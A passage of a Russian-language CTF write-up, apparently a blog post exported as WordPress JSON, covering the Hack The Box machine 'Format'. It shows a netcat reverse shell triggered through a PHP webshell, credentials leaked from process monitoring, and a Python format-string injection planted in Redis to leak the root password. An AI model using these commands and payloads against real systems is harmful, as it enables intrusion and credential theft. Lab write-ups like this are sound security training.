\u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f<\/p>\n\n\n\n
\n
nc -nvlp 7331<\/p>\n<\/blockquote>\n\n\n\n
\u0418 \u043f\u0435\u0440\u0435\u0434\u0430\u0434\u0438\u043c \u0432 PHP webshell \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 cmd \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435:<\/p>\n\n\n\n
\n
nc+yourIP+7331<\/p>\n<\/blockquote>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e www-data, \u043d\u043e \u0444\u043b\u0430\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430\u043c \u0432\u0441\u0451 \u0435\u0449\u0451 \u043d\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d:<\/p>\n\n\n
\nwww-data@format:~\/microblog\/l******e\/uploads$ whoami\nwhoami\nwww-data\nwww-data@format:~\/microblog\/l******e\/uploads$\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e<\/h3>\n\n\n\n
\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u043c \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 pspy<\/code>64, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u0435\u0433\u043e \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0432\u044b\u0432\u043e\u0434:<\/p>\n\n\n
\n[...]\n2023\/07\/28 15:12:03 CMD:   UID=0   PID=4596   | \/usr\/bin\/redis-cli -s \/var\/run\/redis\/redis.sock HSET cooper.dooper username cooper.dooper\n2023\/07\/28 15:12:03 CMD:   UID=0   PID=4597   | \/usr\/bin\/redis-cli -s \/var\/run\/redis\/redis.sock HSET cooper.dooper password zooperdoopercooper\n2023\/07\/28 15:12:03 CMD:   UID=0   PID=4598   | \/usr\/bin\/redis-cli -s \/var\/run\/redis\/redis.sock HSET cooper.dooper first-name Cooper\n2023\/07\/28 15:12:03 CMD:   UID=0   PID=4599   | \/usr\/bin\/redis-cli -s \/var\/run\/redis\/redis.sock HSET cooper.dooper last-name Dooder\n2023\/07\/28 15:12:03 CMD:   UID=0   PID=4600   | \/usr\/bin\/redis-cli -s \/var\/run\/redis\/redis.sock HSET cooper.dooper pro false\n2023\/07\/28 15:12:03 CMD:   UID=0   PID=4601   | \/usr\/bin\/redis-cli -s \/var\/run\/redis\/redis.sock LPUSH cooper.dooper:sites sunny\n[...]\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f cooper<\/code>:zooperdoopercooper<\/code><\/p>\n\n\n\n
\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0435\u0433\u043e:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433\u0443!<\/p>\n\n\n\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0434\u043e root<\/h3>\n\n\n\n
\u0418\u0449\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root:<\/p>\n\n\n
\nsudo -l\n<\/pre><\/div>\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0417\u0430\u043f\u0443\u0441\u0442\u0438\u043c \u044d\u0442\u043e\u0442 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b:<\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u0412\u044b\u0432\u0435\u0434\u0435\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438 \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0435\u0433\u043e \u0447\u0430\u0441\u0442\u0438:<\/p>\n\n\n
\nimport base64\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom cryptography.fernet import Fernet\nimport random\nimport string\nfrom datetime import date\nimport redis\nimport argparse\nimport os\nimport sys\n\nclass License():\n    def __init__(self):\n        chars = string.ascii_letters + string.digits + string.punctuation\n        self.license = ''.join(random.choice(chars) for i in range(40))\n        self.created = date.today()\n\nif os.geteuid() != 0:\n    print("")\n    print("Microblog license key manager can only be run as root")\n    print("")\n    sys.exit()\n\nparser = argparse.ArgumentParser(description='Microblog license key manager')\ngroup = parser.add_mutually_exclusive_group(required=True)\ngroup.add_argument('-p', '--provision', help='Provision license key for specified user', metavar='username')\ngroup.add_argument('-d', '--deprovision', help='Deprovision license key for specified user', metavar='username')\ngroup.add_argument('-c', '--check', help='Check if specified license key is valid', metavar='license_key')\nargs = parser.parse_args()\n[...]\nr = redis.Redis(unix_socket_path='\/var\/run\/redis\/redis.sock')\n\nsecret = [line.strip() for line in open("\/root\/license\/secret")][0]\nsecret_encoded = secret.encode()\nsalt = b'microblogsalt123'\nkdf = PBKDF2HMAC(algorithm=hashes.SHA256(),length=32,salt=salt,iterations=100000,backend=default_backend())\nencryption_key = base64.urlsafe_b64encode(kdf.derive(secret_encoded))\n\nf = Fernet(encryption_key)\nl = License()\n\n#provision\nif(args.provision):\n    user_profile = r.hgetall(args.provision)\n    if not user_profile:\n        print("")\n        print("User does not exist. Please provide valid username.")\n        print("")\n        sys.exit()\n    existing_keys = open("\/root\/license\/keys", "r")\n    all_keys = existing_keys.readlines()\n    for user_key in all_keys:\n        if(user_key.split(":")[0] == args.provision):\n            print("")\n            print("License key has already been provisioned for this user")\n            print("")\n            sys.exit()\n    prefix = "microblog"\n    username = r.hget(args.provision, "username").decode()\n    firstlast = r.hget(args.provision, "first-name").decode() + r.hget(args.provision, "last-name").decode()\n    license_key = (prefix + username + "{license.license}" + firstlast).format(license=l)\n    print("")\n    print("Plaintext license key:")\n    print("------------------------------------------------------")\n    print(license_key)\n    print("")\n    license_key_encoded = license_key.encode()\n    license_key_encrypted = f.encrypt(license_key_encoded)\n    print("Encrypted license key (distribute to customer):")\n    print("------------------------------------------------------")\n    print(license_key_encrypted.decode())\n    print("")\n    with open("\/root\/license\/keys", "a") as license_keys_file:\n        license_keys_file.write(args.provision + ":" + license_key_encrypted.decode() + "\\n")\n[...]\n<\/pre><\/div>\n\n\n
\u0414\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 \u0440\u0430\u043d\u0435\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 NoSQL \u0421\u0423\u0411\u0414 Redis, \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u044f\u0441\u044c \u043a \u043d\u0435\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044f \u0432 \/root\/license\/secret<\/code>, \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0447\u0430\u0441\u0442\u0438 \u043a\u043e\u0434\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0442\u043e\u0433\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043b\u0438 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0438 \u0437\u0430\u0442\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u043a\u043b\u044e\u0447 \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0438 \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e {license.license}<\/code>. \u0424\u0443\u043d\u043a\u0446\u0438\u044f format() \u044f\u0437\u044b\u043a\u0430 Python \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0443\u0441\u0442\u0440\u043e\u0435\u043d \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0443\u044f\u0437\u0432\u0438\u043c\u0430 \u043a \u0440\u044f\u0434\u0443 \u0430\u0442\u0430\u043a – Format String, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u043c \u0441\u0447\u0438\u0442\u0430\u0442\u044c \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \/root\/licence\/secret<\/code>. \u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u043d\u043e\u0432\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0432\u0435\u0431 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 microblog.htb \u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f cooper<\/code> \u0432\u043d\u0435\u0434\u0440\u0438\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0441\u0442\u0440\u043e\u043a\u0443 \u0432 \u0431\u0430\u0437\u0443 Redis \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:<\/p>\n\n\n
\ncooper@format:~$ redis-cli -s \/run\/redis\/redis.sock \nredis \/run\/redis\/redis.sock> INFO keyspace\n# Keyspace\ndb0:keys=4,expires=1,avg_ttl=1422098\nredis \/run\/redis\/redis.sock> select 0\nOK\nredis \/run\/redis\/redis.sock> keys *\n1) "cooper.dooper:sites"\n2) "e******l"\n3) "PHPREDIS_SESSION:d7rhub22llhlaq7bl9a327cg5u"\n4) "cooper.dooper"\nredis \/var\/run\/redis\/redis.sock> HMSET e******l first-name "{license.__init__.__globals__[secret_encoded]}" last-name e******l username e******l\nOK\nredis \/var\/run\/redis\/redis.sock> exit\ncooper@format:~$ sudo \/usr\/bin\/license -p e******l\n\nPlaintext license key:\n------------------------------------------------------\nmicrobloge******l&lt;}e0d5bZc#)!Ef0()(NnX1vkA')|AD:A}e\/eGq{tb'unCR4ckaBL3Pa$$w0rd'e******l\n\nEncrypted license key (distribute to customer):\n------------------------------------------------------\ngAAAAABktmfRMq1QRvBJx1fTjlBnRA9Zkpvt0y6AA3maGpQRnHnwNPoS2CYOY3bFQnymqV2Pz-VJw1CdW865NZsExL-WVblJJN2Fy0RaUs8fpgtDnzm-PKp_LHm0zssyDAOls397PhzVh186SfGHK_bKbRSCo9jARNUAOZ9ViR05lKDcyIPrMJQ=\n<\/pre><\/div>\n\n\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u043e\u0442 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 root<\/code>: unCR4ckaBL3Pa$$w0rd<\/code><\/p>\n\n\n
\n
\"\"<\/figure><\/div>\n\n\n
<\/p>\n\n\n\n
\u041c\u044b \u0441\u043c\u043e\u0433\u043b\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e root<\/code> \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433!<\/p>\n\n\n\n
\u0421\u0441\u044b\u043b\u043a\u0438:<\/h3>\n\n\n\n
https:\/\/github.com\/DominicBreuker\/pspy<\/a><\/p>\n\n\n\n
https:\/\/linuxhint.com\/redis-hset\/<\/a><\/p>\n\n\n\n
https:\/\/podalirius.net\/en\/articles\/python-format-string-vulnerabilities\/<\/a><\/p>\n\n\n\n
https:\/\/www.geeksforgeeks.org\/vulnerability-in-str-format-in-python\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Medium \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 30 IP: 10.10.11.213 \u0422\u0435\u0433\u0438: XSS, LFI, Redis, RCE, Format String Injection \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0441\u0435\u0440\u0432\u0438\u0441 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u044d\u043a\u0435\u043d\u0434\u0430 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 PHP. \u0414\u0430\u043b\u0435\u0435, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0447\u0442\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b. \u041f\u043e\u043b\u0443\u0447\u0438\u0432 \u0441\u0442\u0430\u0442\u0443\u0441 Pro \u0434\u043b\u044f \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0441\u0435\u0440\u0432\u0438\u0441\u0430 […]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-697","post","type-post","status-publish","format-standard","hentry","category-blog"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/697","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=697"}],"version-history":[{"count":22,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/697\/revisions"}],"predecessor-version":[{"id":732,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/697\/revisions\/732"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=697"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}